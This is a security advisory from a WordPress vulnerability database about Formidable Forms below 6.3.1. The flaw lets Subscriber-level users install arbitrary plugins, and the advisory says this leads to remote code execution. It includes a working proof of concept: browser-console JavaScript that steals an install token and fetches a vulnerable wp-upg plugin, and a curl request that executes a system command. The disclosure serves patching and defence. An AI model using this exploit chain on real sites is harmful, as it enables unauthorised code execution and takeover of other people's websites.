WordPress Plugin Vulnerabilities
Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution
Description
The plugin does not adequately authorize the user or validate the plugin URL in its functionality for installing add-ons. This allows a user with a role as low as Subscriber to install and activate arbitrary plugins of arbitrary versions from the WordPress.org plugin repository onto the site, leading to Remote Code Execution.
Proof of Concept
1. As a Subscriber user, visit `/wp-admin/admin.php?page=formidable-welcome`
2. Run the following JavaScript code in the browser console:
var token = jQuery('a.button-primary.frm-button-primary')[0].href.replace(/^.*token=(\w+).*$/, '$1');
await fetch( `/wp-json/frm-admin/v1/install-addon?token=${token}&file_url=https://downloads.wordpress.org/plugin/wp-upg.2.19.zip` );
3. Note that version 2.19 of the `wp-upg` plugin has been installed, despite being closed and having a known security vulnerability. Any version of any WordPress.org plugin could be installed here.
4. For RCE with the `wp-upg` plugin, run the following `curl` command:
curl -i 'https://SITE_URL/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:id:NULL:NULL' Affects Plugins
Fixed in version 6.3.1
References
Classification
Miscellaneous
Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
Verified
Yes
Timeline
Publicly Published
2023-06-05 (about 3 months ago)
Added
2023-06-05 (about 3 months ago)
Last Updated
2023-06-05 (about 3 months ago)